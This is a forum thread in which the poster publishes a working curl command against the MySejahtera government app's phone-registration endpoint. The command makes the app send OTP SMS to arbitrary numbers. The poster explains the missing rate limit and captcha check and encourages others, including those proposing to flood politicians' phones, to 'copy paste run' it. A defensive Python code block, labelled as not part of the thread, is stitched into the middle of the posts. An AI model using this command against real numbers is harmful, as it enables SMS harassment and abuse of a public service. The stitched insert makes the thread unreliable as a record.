 MySejahtera Not So Sejahtera, Full of Exploits

TSDarkripper
post Oct 18 2021, 01:51 PM, updated 5y ago

What do you expect?
******
Senior Member
1,258 posts

Joined: Dec 2008
From: /k/
You can instruct "MySejahtera" to spam OTP to others at will. Just run the following code in your terminal of choice and change the contact number (Windows users, figure out the changes yourselves).

CODE
curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \
--form 'countryCode="60"' \
--form 'contactNumber="12345678"'

TSDarkripper
post Oct 18 2021, 02:13 PM

QUOTE(imin @ Oct 18 2021, 02:04 PM)
I'm not testing if this really works, but if it does, then the backend looks like it's developed by some intern IT student
*
Go ahead and try, the URL is legit anyways. Can use Postman or other tools as well, as long as you send that form-data, it works. These mistakes are worse than interns lol.

QUOTE(kidmad @ Oct 18 2021, 02:08 PM)
this api should not even be exposed! it's supposed to be called by a backend module! ..
*
They kinda forgot to verify the captcha actually. They have a Captcha on the page, but the backend doesn't verify that token.
TSDarkripper
post Oct 18 2021, 02:15 PM

QUOTE(WaCKy-Angel @ Oct 18 2021, 02:12 PM)
do u even need exploit?

ayam thought u can just try login with the number and the app will send otp?
*
There is no rate limit, meaning you can repeatedly keep on requesting OTPs with a simple script.

Triggering OTP is not the issue, the issue is the lack of an Authentication/Authorization token. Maybe the implementor had the same thought as you.

Also, the OTP token never changes, at least for the past 19 hours that I have been spamming myself.

This post has been edited by Darkripper: Oct 18 2021, 02:16 PM
TSDarkripper
post Oct 18 2021, 02:27 PM

QUOTE(kidmad @ Oct 18 2021, 02:23 PM)
to send notifications they can just use something like Big-IP F5 to whitelist so that only allowed IP addresses could access the endpoints. in fact just build the service separately, with segregation between internal and external network.
*
They can't do that, as that's the endpoint that the client side is calling to trigger it. The easiest way is just to rate limit + some kind of Captcha. That would reduce the exposure to an acceptable limit.

QUOTE(WaCKy-Angel @ Oct 18 2021, 02:24 PM)
A simple captcha will not be sufficient to block hacker.

Anyway security vs convenience has always been a cat and mouse game. The more u do the more hackers want to find exploits lol.
*
It won't solve all, but it reduces the exposure.
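
Added example, not part of the thread and not MySejahtera's code: a minimal server-side sketch of the three controls the posts above say were missing (captcha token verified by the backend, a rate limit per destination number and per client, and an OTP that changes and expires). The class name, the `verify_captcha` and `send_sms` hooks and all limits are assumptions chosen for illustration.

```python
import hmac
import secrets
import time
from collections import defaultdict, deque

WINDOW_S, MAX_SENDS = 600, 3    # at most 3 OTP SMS per key per 10 minutes
OTP_TTL_S, MAX_TRIES = 300, 5   # code lives 5 minutes, 5 guesses at most

class OtpService:
    # verify_captcha(token) -> bool and send_sms(number, code) are hypothetical
    # hooks for the captcha provider's server-side check and the SMS gateway.
    def __init__(self, verify_captcha, send_sms, clock=time.monotonic):
        self.verify_captcha, self.send_sms, self.clock = verify_captcha, send_sms, clock
        self.sends = defaultdict(deque)  # limiter key -> timestamps of recent sends
        self.pending = {}                # number -> [code, expires_at, tries_left]

    def _limited(self, key):
        now, q = self.clock(), self.sends[key]
        while q and now - q[0] >= WINDOW_S:  # drop sends outside the window
            q.popleft()
        return len(q) >= MAX_SENDS

    def request_otp(self, number, client_ip, captcha_token):
        # 1. The captcha token is checked by the server, not just shown on the page.
        if not captcha_token or not self.verify_captcha(captcha_token):
            return 403
        # 2. Limit per destination number as well as per client address, so
        #    rotating source addresses cannot flood one phone.
        keys = ("num:" + number, "ip:" + client_ip)
        if any(self._limited(k) for k in keys):
            return 429
        now = self.clock()
        for k in keys:
            self.sends[k].append(now)
        # 3. Every request issues a fresh random code with an expiry.
        code = f"{secrets.randbelow(10**6):06d}"
        self.pending[number] = [code, now + OTP_TTL_S, MAX_TRIES]
        self.send_sms(number, code)
        return 200

    def check_otp(self, number, guess):
        entry = self.pending.get(number)
        if entry is None or self.clock() >= entry[1]:
            self.pending.pop(number, None)  # unknown or expired
            return False
        entry[2] -= 1
        ok = hmac.compare_digest(entry[0].encode(), guess.encode())
        if ok or entry[2] <= 0:
            del self.pending[number]        # single use, bounded guessing
        return ok
```

In a real deployment the limiter and pending-code state would live in a shared store rather than process memory, so that every application instance sees the same counters.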
TSDarkripper
post Oct 18 2021, 02:37 PM

QUOTE(jmas @ Oct 18 2021, 02:29 PM)
i tot already debunked that 70mil does not include mysejahtera?
*
Cost is not the question here. This is a critical app required by most residents in Malaysia, cannot compromise on security yo. Imagine a data-breach?


QUOTE(kons @ Oct 18 2021, 02:32 PM)
tengine webserver...

twitter bootstrap.. google font api... owl carousel.. jquery...

all free stuff but cost 70m... thanks to our competent gomen.
*
I see you're a man of culture here. jQuery hurts my eyes tho.
TSDarkripper
post Oct 18 2021, 02:37 PM

QUOTE(WaCKy-Angel @ Oct 18 2021, 02:34 PM)
iinm mysejahtera was developed merely for check-in purposes but now has become more important.
of course security wise is not top priority back then.

Why not u tweet KJ about this and see what actions he will take?
*
tweeted, still no news yet. So yeah
TSDarkripper
post Oct 18 2021, 02:40 PM

QUOTE(WaCKy-Angel @ Oct 18 2021, 02:38 PM)
slowly lah wait he think of a good cum back like dajjal hahahaha

who knows later he will employ u as their Security consultant eh
*
Btw seems like the dev is fixing, some of the other exploits are getting patched. But still doesn't give much confidence when they don't acknowledge it.

This post has been edited by Darkripper: Oct 18 2021, 02:40 PM
TSDarkripper
post Oct 18 2021, 02:46 PM

QUOTE(jmas @ Oct 18 2021, 02:43 PM)
not denying the app is critical, just correcting the fact that ppl thought the apps cost 70mil to develop and discounting the effort of the developers
but the truth is the developer was doing this for free (initially) and I think only officially get paid around end of last year/early this year
*
Good to do it for free, the issue is on Govt for not ensuring quality in such a critical application. Devs are probably getting squeezed also la.
TSDarkripper
post Oct 18 2021, 11:13 PM

QUOTE(kidmad @ Oct 18 2021, 08:19 PM)
client side to trigger? it doesn't work that way. the service i work on sends millions of sms daily. we are the ones triggering an endpoint exposed by the provider. mysejahtera would have the list of contacts on their end. all they need to do is periodically send the sms via the endpoints exposed by the few operators we have.

if it's really trigger by us who has mysejahtera that's stupid
*
you're talking about their backend implementation, which is out-of-reach. The client triggers mysejahtera, which in turn forwards it to the provider. It doesn't matter how the backend is implemented if they open their doors wide open.


TSDarkripper
post Oct 19 2021, 02:46 AM

QUOTE(TruboXL @ Oct 19 2021, 01:23 AM)
Spamming KJ phone number will ruckle some feathers
*
QUOTE(IJustWantToAsk @ Oct 19 2021, 02:37 AM)
If you want, go bombard those politicians phone number

See if this really works
*
PM me their number lor. It's a curl command, you can try it for yourself. It's pretty much copy paste run.

QUOTE(God Grid @ Oct 19 2021, 02:33 AM)
What's wrong with jQuery? Hmmm...
*
Its time had passed.


TSDarkripper
post Oct 19 2021, 02:51 AM

QUOTE(God Grid @ Oct 19 2021, 02:47 AM)
How bad is it? I dunno frontend, so no idea

I mean, there are other frameworks like React, Vue and Angular, but those are not UI only right?
*
jQuery is the top go-to library when everyone is manually manipulating HTML elements for the frontend, it is easier to use than vanilla JS. It is not bad, it is just not that relevant anymore.

Then SPAs like Angular and React came along, which are easier to code, a little bit more structured and efficient. The best thing about SPAs is there are fewer page refreshes, providing a better UX.

Now you even have Vue, Svelte, SolidJS which are trying to overtake React.

It's not just for UI, but for client-side aka frontend to render and do whatever it needs to (communicate with server, service worker to run some shit in the background)

This post has been edited by Darkripper: Oct 19 2021, 02:52 AM
TSDarkripper
post Oct 20 2021, 04:46 PM

QUOTE(brkli @ Oct 20 2021, 04:05 PM)
poor TS...
*
What?
TSDarkripper
post Oct 21 2021, 02:57 PM

QUOTE(IamNOT @ Oct 21 2021, 10:40 AM)
Fxxk... The change email/phone no do not require verification from old email/phone no..... Security 404... Use throw away email also useless...
*
aiya, they say it's a feature that got exposed. lel... *FEATURE*.

Btw they haven't fixed it yet also, just added reCAPTCHA, which can be solved using API also

 
